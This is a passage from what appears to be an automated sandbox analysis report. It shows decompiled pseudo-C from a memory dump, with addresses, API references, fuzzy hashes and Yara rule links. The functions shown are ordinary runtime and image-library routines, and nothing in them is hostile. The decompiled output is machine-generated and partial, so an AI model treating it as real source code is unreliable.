									_t284 = _v88;
								}
								L41:
								_t289 = _t284 + _t273;
								__eflags = _t289;
								L42:
								__eflags = _v60;
								_v88 = _t289;
							} else {
								_t274 = _v40;
								_t294 = _t242;
								_t263 = _v116;
								do {
									 *((char*)(_t298 + _t294 - 0xc)) =  *((intOrPtr*)(_t263 + _t294));
									_t294 =  &(_t294->Internal);
								} while (_t294 < _t274);
								_t295 = _v48;
								_t264 = _v44;
								if(_v48 > 0) {
									E6EE37600( &_v16 + _t274, _t278, _t295);
									_t264 = _v44;
									_t301 = _t301 + 0xc;
									_t274 = _v40;
								}
								_t282 = _v80;
								_t296 = _t242;
								do {
									 *( *((intOrPtr*)(0x6ee79368 + _t282 * 4)) + _t264 + _t296 + 0x2e) = _t242;
									_t296 =  &(_t296->Internal);
								} while (_t296 < _t274);
								_t278 = _v104;
								_t291 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6EE4F273( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t303 = _t301 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L49;
								} else {
									L19:
									_t278 = _t278 - 1 + _t291;
									L28:
									_t278 =  &(_t278[1]);
									_v104 = _t278;
									_t193 = E6EE4D232(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L49;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L48:
											_v92 = GetLastError();
											goto L49;
										} else {
											_t284 = _v84 - _v108 + _t278;
											_v88 = _t284;
											if(_v100 < _v56) {
												goto L49;
											} else {
												if(_v51 != 0xa) {
													L35:
													if(_t278 >= _v96) {
														goto L49;
													} else {
														_t248 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L48;
													} else {
														if(_v100 < 1) {
															goto L49;
														} else {
															_v84 = _v84 + 1;
															_t284 = _t284 + 1;
															_v88 = _t284;
															goto L35;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L50;
						L20:
						_t268 =  *((intOrPtr*)(_t251 + _t186 + 0x2d));
						__eflags = _t268 & 0x00000004;
						if((_t268 & 0x00000004) == 0) {
							_v33 =  *_t278;
							_t188 = E6EE41111(_t268, _t326);
							_t252 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t252 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t252 * 2)) >= _t242) {
								_push(1);
								_push(_t278);
								goto L27;
							} else {
								_t100 =  &(_t278[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t275 = _v80;
									_t254 = _v44;
									 *((char*)(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2e)) = _v33;
									 *(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2d) =  *(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t284 + 1;
									goto L42;
								} else {
									_t206 = E6EE45629( &_v76, _t278, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L49;
									} else {
										_t278 = _v56;
										goto L28;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t251 + _t186 + 0x2e));
							_v23 =  *_t278;
							_push(2);
							 *(_t251 + _v48 + 0x2d) = _t268 & 0x000000fb;
							_push( &_v24);
							L27:
							_push( &_v76);
							_t190 = E6EE45629();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L49;
							} else {
								goto L28;
							}
						}
						goto L50;
					}
				}
				L50:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6EE361A7(_v8 ^ _t298);
			}

0x6ee4a208
0x6ee4a20b
0x6ee4a20d
0x6ee4a213
0x6ee4a21a
0x6ee4a21d
0x6ee4a225
0x6ee4a228
0x6ee4a235
0x6ee4a238
0x6ee4a23b
0x6ee4a242
0x6ee4a24a
0x6ee4a24d
0x6ee4a250
0x6ee4a256
0x6ee4a258
0x6ee4a25f
0x6ee4a269
0x6ee4a26b
0x6ee4a26e
0x6ee4a271
0x6ee4a274
0x6ee4a277
0x6ee4a27a
0x6ee4a280
0x6ee4a58b
0x6ee4a58b
0x00000000
0x6ee4a286
0x6ee4a28e
0x6ee4a291
0x6ee4a297
0x6ee4a29a
0x6ee4a2a1
0x6ee4a2a8
0x6ee4a2ab
0x00000000
0x00000000
0x6ee4a2b4
0x6ee4a2b9
0x6ee4a2bb
0x6ee4a2be
0x6ee4a2c3
0x6ee4a2c7
0x00000000
0x00000000
0x00000000
0x6ee4a2c7
0x6ee4a2cc
0x6ee4a2ce
0x6ee4a2d3
0x6ee4a38d
0x6ee4a394
0x6ee4a395
0x6ee4a398
0x6ee4a39a
0x6ee4a53e
0x6ee4a540
0x00000000
0x6ee4a542
0x6ee4a542
0x6ee4a545
0x6ee4a554
0x6ee4a558
0x6ee4a559
0x6ee4a559
0x00000000
0x6ee4a55d
0x6ee4a3a0
0x6ee4a3a2
0x6ee4a3a8
0x6ee4a3ab
0x6ee4a3b7
0x6ee4a3c0
0x6ee4a3cb
0x6ee4a3d0
0x6ee4a3d3
0x6ee4a3d6
0x00000000
0x6ee4a3dc
0x6ee4a3dc
0x00000000
0x6ee4a3dc
0x6ee4a3d6
0x6ee4a2d9
0x6ee4a2e8
0x6ee4a2e9
0x6ee4a2ec
0x6ee4a2ef
0x6ee4a2f4
0x6ee4a50a
0x6ee4a50c
0x6ee4a50e
0x6ee4a510
0x6ee4a51a
0x6ee4a522
0x6ee4a524
0x6ee4a525
0x6ee4a529
0x6ee4a52c
0x6ee4a52c
0x6ee4a530
0x6ee4a530
0x6ee4a530
0x6ee4a533
0x6ee4a533
0x6ee4a533
0x6ee4a535
0x6ee4a535
0x6ee4a539
0x6ee4a2fa
0x6ee4a2fa
0x6ee4a2fd
0x6ee4a2ff
0x6ee4a302
0x6ee4a305
0x6ee4a309
0x6ee4a30a
0x6ee4a30e
0x6ee4a311
0x6ee4a316
0x6ee4a320
0x6ee4a325
0x6ee4a328
0x6ee4a32b
0x6ee4a32b
0x6ee4a32e
0x6ee4a331
0x6ee4a333
0x6ee4a33c
0x6ee4a340
0x6ee4a341
0x6ee4a345
0x6ee4a34b
0x6ee4a354
0x6ee4a361
0x6ee4a368
0x6ee4a36c
0x6ee4a377
0x6ee4a37c
0x6ee4a382
0x00000000
0x6ee4a388
0x6ee4a3df
0x6ee4a3e0
0x6ee4a463
0x6ee4a46a
0x6ee4a472
0x6ee4a47a
0x6ee4a47f
0x6ee4a482
0x6ee4a487
0x00000000
0x6ee4a48d
0x6ee4a4a2
0x6ee4a582
0x6ee4a588
0x00000000
0x6ee4a4a8
0x6ee4a4b1
0x6ee4a4b3
0x6ee4a4b9
0x00000000
0x6ee4a4bf
0x6ee4a4c3
0x6ee4a4f9
0x6ee4a4fc
0x00000000
0x6ee4a502
0x6ee4a502
0x00000000
0x6ee4a502
0x6ee4a4c5
0x6ee4a4c7
0x6ee4a4c9
0x6ee4a4e2
0x00000000
0x6ee4a4e8
0x6ee4a4ec
0x00000000
0x6ee4a4f2
0x6ee4a4f2
0x6ee4a4f5
0x6ee4a4f6
0x00000000
0x6ee4a4f6
0x6ee4a4ec
0x6ee4a4e2
0x6ee4a4c3
0x6ee4a4b9
0x6ee4a4a2
0x6ee4a487
0x6ee4a382
0x6ee4a2f4
0x00000000
0x6ee4a3e4
0x6ee4a3e4
0x6ee4a3e8
0x6ee4a3eb
0x6ee4a40d
0x6ee4a410
0x6ee4a415
0x6ee4a419
0x6ee4a41d
0x6ee4a44b
0x6ee4a44d
0x00000000
0x6ee4a41f
0x6ee4a41f
0x6ee4a41f
0x6ee4a422
0x6ee4a425
0x6ee4a428
0x6ee4a55f
0x6ee4a562
0x6ee4a56f
0x6ee4a57a
0x6ee4a57f
0x00000000
0x6ee4a42e
0x6ee4a435
0x6ee4a43a
0x6ee4a43d
0x6ee4a440
0x00000000
0x6ee4a446
0x6ee4a446
0x00000000
0x6ee4a446
0x6ee4a440
0x6ee4a428
0x6ee4a3ed
0x6ee4a3f4
0x6ee4a3f9
0x6ee4a3ff
0x6ee4a401
0x6ee4a408
0x6ee4a44e
0x6ee4a451
0x6ee4a452
0x6ee4a457
0x6ee4a45a
0x6ee4a45d
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4a45d
0x00000000
0x6ee4a3eb
0x6ee4a286
0x6ee4a58e
0x6ee4a58e
0x6ee4a590
0x6ee4a593
0x6ee4a593
0x6ee4a593
0x6ee4a593
0x6ee4a5a5
0x6ee4a5a7
0x6ee4a5a8
0x6ee4a5a9
0x6ee4a5b3

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 6EE4A250
__fassign.LIBCMT ref: 6EE4A435
__fassign.LIBCMT ref: 6EE4A452
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EE4A49A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EE4A4DA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EE4A582

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 8ad58b60bb5d905c5e31d2aaebd7caab8f16809de8ffbf87571c5f14720bd30c
Instruction ID: f44758757f769ecd7b6ae00f9772529dc89c1d56811ddad7c5199533d5ccda50
Opcode Fuzzy Hash: 8ad58b60bb5d905c5e31d2aaebd7caab8f16809de8ffbf87571c5f14720bd30c
Instruction Fuzzy Hash: 03C19F71D00259DFDF00CFE8D9809DDBBB9AF49314F28416AE859B7341E7359A02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6EE35DE9, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6EE35E32
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6EE35E9D
LCMapStringEx.KERNEL32 ref: 6EE35EBA
LCMapStringEx.KERNEL32 ref: 6EE35EF9
LCMapStringEx.KERNEL32 ref: 6EE35F58
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6EE35F7B

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 56566731d4e9670d857b52e521a9635f2e225ce44b9703c63cc4433567200e49
Instruction ID: 5763b2aa7e298a8a5678e45c5b9d869b5c22eb32ce619791d8cc7f23c31b19e7
Opcode Fuzzy Hash: 56566731d4e9670d857b52e521a9635f2e225ce44b9703c63cc4433567200e49
Instruction Fuzzy Hash: 85518D7652062AAFEF108FE5CC44FAB3BB9EB41748F314429F91496390D735C919CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCBCF0, Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EDCBCF0(intOrPtr __ecx, void* __eflags, char _a4, char _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				intOrPtr* _t36;
				intOrPtr* _t38;
				signed char _t47;
				intOrPtr* _t48;
				signed char _t56;

				_v8 = __ecx;
				E6EDCCF30(_v8);
				_push( &_a12);
				_push( &_a4);
				E6EDB1340( &_a12);
				_t36 = E6EDB1440( &_a4);
				_v16 =  *_t36;
				_v12 =  *((intOrPtr*)(_t36 + 4));
				_t38 = E6EDB1440( &_a12);
				_v32 =  *_t38;
				_v28 =  *((intOrPtr*)(_t38 + 4));
				E6EDCD230(_v8, __eflags,  &_v24);
				E6EDCD2D0(_v8, __eflags,  &_v40);
				while((E6EDCC590( &_v16,  &_v32) & 0x000000ff) != 0) {
					_t47 = E6EDCC560( &_v24,  &_v40);
					_t92 = _t47 & 0x000000ff;
					if((_t47 & 0x000000ff) == 0) {
						_t48 = E6EDCC600( &_v16, __eflags);
						 *((char*)(E6EDCC650( &_v24))) =  *_t48;
						E6EDCC690( &_v24);
						E6EDCC670( &_v16);
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E6EDCBEB0(_v8, _t92, E6EDCC600( &_v16, _t92));
						E6EDCC670( &_v16);
						_t56 = E6EDCC590( &_v16,  &_v32);
					} while ((_t56 & 0x000000ff) != 0);
					return _t56;
				}
				return E6EDCC8E0(_v8, E6EDCC6D0( &_v40,  &_v24));
			}

0x6edcbcf7
0x6edcbcfd
0x6edcbd05
0x6edcbd09
0x6edcbd0a
0x6edcbd16
0x6edcbd23
0x6edcbd26
0x6edcbd2d
0x6edcbd3a
0x6edcbd3d
0x6edcbd47
0x6edcbd53
0x6edcbd62
0x6edcbd7c
0x6edcbd84
0x6edcbd86
0x6edcbdb9
0x6edcbdca
0x6edcbdcf
0x6edcbd5d
0x00000000
0x00000000
0x00000000
0x00000000
0x6edcbd88
0x6edcbd88
0x6edcbd94
0x6edcbd9c
0x6edcbda8
0x6edcbdb0
0x00000000
0x6edcbd88
0x00000000

APIs

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6EDCBCFD
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6EDCBD5D
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6EDCBD69

Part of subcall function 6EDCC590: std::error_category::operator==.LIBCPMTD ref: 6EDCC5A0

std::error_category::operator==.LIBCPMTD ref: 6EDCBD7C
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6EDCBD9C
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6EDCBDA8

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Affinity::operator!=FrameHandlerHandler3::HardwareMap::iterator::operator++std::error_category::operator==$Base::ContextIdentityQueueWork
String ID:
API String ID: 1043390661-0
Opcode ID: c6ad3f7cfa89417c93a59d2160ba7eb85de3f1ab4f6a739b3c60e71360977317
Instruction ID: 0088fcbe821567fd3b536fc38228b990f0cc6498fc115ae3e25fdde0f69c00bc
Opcode Fuzzy Hash: c6ad3f7cfa89417c93a59d2160ba7eb85de3f1ab4f6a739b3c60e71360977317
Instruction Fuzzy Hash: 70313475C00109AFCB08DFD4D9908EEB7BDAE58644B104969D5426B190EF30EB09CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6EE394B1, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE394B1(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6ee77a90 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6EE3A6AB(_t13, __eflags,  *0x6ee77a90);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EE3A6E6(_t14, __eflags,  *0x6ee77a90, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6EE40C36();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EE3A6E6(_t18, __eflags,  *0x6ee77a90, 0);
								} else {
									_t8 = E6EE3A6E6(_t18, __eflags,  *0x6ee77a90, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EE3ACC7(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ee394b1
0x6ee394b8
0x6ee394cb
0x6ee394d2
0x6ee394d4
0x6ee394d5
0x6ee394d8
0x6ee394f1
0x6ee394f1
0x6ee394da
0x6ee394da
0x6ee394dc
0x6ee394e6
0x6ee394ed
0x6ee394ef
0x6ee394f6
0x6ee394ff
0x6ee39502
0x6ee39503
0x6ee39505
0x6ee39519
0x6ee39519
0x6ee39522
0x6ee39507
0x6ee3950e
0x6ee39514
0x6ee39515
0x6ee39517
0x6ee3952b
0x6ee3952d
0x6ee3952d
0x00000000
0x00000000
0x00000000
0x6ee39517
0x6ee39530
0x00000000
0x00000000
0x00000000
0x6ee394ef
0x6ee394dc
0x6ee39538
0x6ee39542
0x6ee394ba
0x6ee394bc
0x6ee394bc

APIs

GetLastError.KERNEL32(00000001,?,6EE393C2,6EE36D26,6EE36886,?,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0,0000000C,6EE36BB7), ref: 6EE394BF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EE394CD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EE394E6
SetLastError.KERNEL32(00000000,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0,0000000C,6EE36BB7,?,00000001,?), ref: 6EE39538

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: abe2bb2f8963dc34acbd12683c660559412c27e9a01bf93beeca4b90dd9f97fe
Instruction ID: 005bc02640ea62a65588d66090cb50f1f055e30f26e154ef2bb341e281137706
Opcode Fuzzy Hash: abe2bb2f8963dc34acbd12683c660559412c27e9a01bf93beeca4b90dd9f97fe
Instruction Fuzzy Hash: E4019E3212CA336EAF5415F8BCC499B3699DB422BEB30033DF569806D8EF524891C550

Uniqueness

Uniqueness Score: -1.00%

Function 6EE20D60, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EE20D60(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t106;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t157;
				intOrPtr _t162;
				signed int _t170;
				void* _t176;
				void* _t177;

				_t186 = __fp0;
				_t175 = __esi;
				_t174 = __edi;
				_t149 = __edx;
				_t126 = __ebx;
				_t180 = _a4;
				if(_a4 == 0) {
					_push(0xab);
					E6EE3EEBE(__ebx, __edx, __edi, __esi, _t180, __fp0, L"p_image_src != 00", L"image.c");
					_t176 = _t176 + 0xc;
				}
				_t181 = _a8;
				if(_a8 == 0) {
					_push(0xac);
					E6EE3EEBE(_t126, _t149, _t174, _t175, _t181, _t186, L"p_image_dest != 00", L"image.c");
					_t176 = _t176 + 0xc;
				}
				 *_a8 =  *_a4;
				 *((intOrPtr*)(_a8 + 4)) =  *((intOrPtr*)(_a4 + 4));
				 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 8));
				 *((intOrPtr*)(_a8 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc));
				if( *(_a8 + 0x18) == 0) {
					L12:
					 *(_a8 + 0x10) =  *(_a4 + 0x10);
					_t102 = E6EE20470( *(_a8 + 0x10) * 0x34);
					_t177 = _t176 + 4;
					 *(_a8 + 0x18) = _t102;
					_t157 = _a8;
					__eflags =  *((intOrPtr*)(_t157 + 0x18));
					if( *((intOrPtr*)(_t157 + 0x18)) != 0) {
						_v8 = 0;
						while(1) {
							_t103 = _a8;
							__eflags = _v8 -  *((intOrPtr*)(_t103 + 0x10));
							if(_v8 >=  *((intOrPtr*)(_t103 + 0x10))) {
								break;
							}
							E6EE37600(_v8 * 0x34 +  *(_a8 + 0x18), _v8 * 0x34 +  *((intOrPtr*)(_a4 + 0x18)), 0x34);
							_t177 = _t177 + 0xc;
							 *( *(_a8 + 0x18) + 0x2c + _v8 * 0x34) = 0;
							_t170 = _v8 + 1;
							__eflags = _t170;
							_v8 = _t170;
						}
						 *((intOrPtr*)(_a8 + 0x14)) =  *((intOrPtr*)(_a4 + 0x14));
						 *(_a8 + 0x20) =  *(_a4 + 0x20);
						_t106 = _a8;
						__eflags =  *((intOrPtr*)(_t106 + 0x20));
						if( *((intOrPtr*)(_t106 + 0x20)) == 0) {
							 *(_a8 + 0x1c) = 0;
							return _t106;
						}
						 *(_a8 + 0x1c) = E6EE20470( *(_a8 + 0x20));
						_t162 = _a8;
						__eflags =  *((intOrPtr*)(_t162 + 0x1c));
						if( *((intOrPtr*)(_t162 + 0x1c)) != 0) {
							return E6EE37600( *(_a8 + 0x1c),  *((intOrPtr*)(_a4 + 0x1c)),  *(_a4 + 0x20));
						}
						_t111 = _a8;
						 *(_t111 + 0x1c) = 0;
						 *(_a8 + 0x20) = 0;
						return _t111;
					}
					_t115 = _a8;
					 *(_t115 + 0x18) = 0;
					 *(_a8 + 0x10) = 0;
					return _t115;
				} else {
					_v8 = 0;
					while(_v8 <  *(_a8 + 0x10)) {
						_v12 = _v8 * 0x34 +  *(_a8 + 0x18);
						if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
							 *0x6ee67168( *((intOrPtr*)(_v12 + 0x2c)));
						}
						_v8 = _v8 + 1;
					}
					E6EE20590( *(_a8 + 0x18));
					_t176 = _t176 + 4;
					 *(_a8 + 0x18) = 0;
					goto L12;
				}
			}

0x6ee20d60
0x6ee20d60
0x6ee20d60
0x6ee20d60
0x6ee20d60
0x6ee20d66
0x6ee20d6a
0x6ee20d6c
0x6ee20d7b
0x6ee20d80
0x6ee20d80
0x6ee20d83
0x6ee20d87
0x6ee20d89
0x6ee20d98
0x6ee20d9d
0x6ee20d9d
0x6ee20da8
0x6ee20db3
0x6ee20dbf
0x6ee20dcb
0x6ee20dd5
0x6ee20e32
0x6ee20e3b
0x6ee20e46
0x6ee20e4b
0x6ee20e51
0x6ee20e54
0x6ee20e57
0x6ee20e5b
0x6ee20e76
0x6ee20e88
0x6ee20e88
0x6ee20e8e
0x6ee20e91
0x00000000
0x00000000
0x6ee20eab
0x6ee20eb0
0x6ee20ebd
0x6ee20e82
0x6ee20e82
0x6ee20e85
0x6ee20e85
0x6ee20ed0
0x6ee20edc
0x6ee20edf
0x6ee20ee2
0x6ee20ee6
0x6ee20f3e
0x00000000
0x6ee20f3e
0x6ee20efa
0x6ee20efd
0x6ee20f00
0x6ee20f04
0x00000000
0x6ee20f36
0x6ee20f06
0x6ee20f09
0x6ee20f13
0x00000000
0x6ee20f13
0x6ee20e5d
0x6ee20e60
0x6ee20e6a
0x00000000
0x6ee20dd7
0x6ee20dd7
0x6ee20de9
0x6ee20dfe
0x6ee20e08
0x6ee20e11
0x6ee20e11
0x6ee20de6
0x6ee20de6
0x6ee20e20
0x6ee20e25
0x6ee20e2b
0x00000000
0x6ee20e2b

APIs

_opj_image_data_free@4.BCCW1XUJAH(?), ref: 6EE20E11

Strings

p_image_dest != 00, xrefs: 6EE20D93
p_image_src != 00, xrefs: 6EE20D76
image.c, xrefs: 6EE20D8E
image.c, xrefs: 6EE20D71

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_data_free@4
String ID: image.c$image.c$p_image_dest != 00$p_image_src != 00
API String ID: 2595206506-3786744418
Opcode ID: e915161183584ba38635ee1d90a329e56d50ba68067cb0f368001227931986cc
Instruction ID: 0395d08276b3abdcad476853f9b26a92d0e5438bd5ac1ff8745b597535567fe9
Opcode Fuzzy Hash: e915161183584ba38635ee1d90a329e56d50ba68067cb0f368001227931986cc
Instruction Fuzzy Hash: EC6183B4A05209EFDB48CF84D590A99B7B5FB48318F20C199EC594F396D771EA82CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3EDB5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6EE3EDB5(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v1160;
				long _v1164;
				signed int _t12;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr _t35;
				void* _t39;
				signed int _t44;

				_t42 = _t44;
				_t12 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t12 ^ _t44;
				_t26 = _a8;
				_t35 = _a4;
				_t39 = GetStdHandle(0xfffffff4);
				if(_t39 == 0xffffffff || _t39 == 0 || GetFileType(_t39) != 2 || swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t35, _t26, _a12) < 0) {
					L8:
					return E6EE361A7(_v8 ^ _t42);
				} else {
					_t30 =  &_v1160;
					_t33 = _t30 + 2;
					do {
						_t19 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t19 != 0);
					_v1164 = 0;
					_t32 = _t30 - _t33 >> 1;
					if(WriteConsoleW(_t39,  &_v1160, _t30 - _t33 >> 1,  &_v1164, 0) != 0) {
						E6EE3E6F4(_t26, _t32, _t33, 0, _t39, __fp0);
						asm("int3");
						return L"Assertion failed: %Ts, file %Ts, line %d\n";
					} else {
						goto L8;
					}
				}
			}

0x6ee3edb8
0x6ee3edc0
0x6ee3edc7
0x6ee3edcb
0x6ee3edd0
0x6ee3eddb
0x6ee3ede0
0x6ee3ee4f
0x6ee3ee5d
0x6ee3ee14
0x6ee3ee14
0x6ee3ee1c
0x6ee3ee1f
0x6ee3ee1f
0x6ee3ee22
0x6ee3ee25
0x6ee3ee2d
0x6ee3ee39
0x6ee3ee4d
0x6ee3ee5e
0x6ee3ee63
0x6ee3ee69
0x00000000
0x00000000
0x00000000
0x6ee3ee4d

APIs

GetStdHandle.KERNEL32(000000F4,?,00000030), ref: 6EE3EDD5
GetFileType.KERNEL32(00000000,?,00000030), ref: 6EE3EDE7
swprintf.LIBCMT ref: 6EE3EE08
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000030), ref: 6EE3EE45

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 6EE3EDFD

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
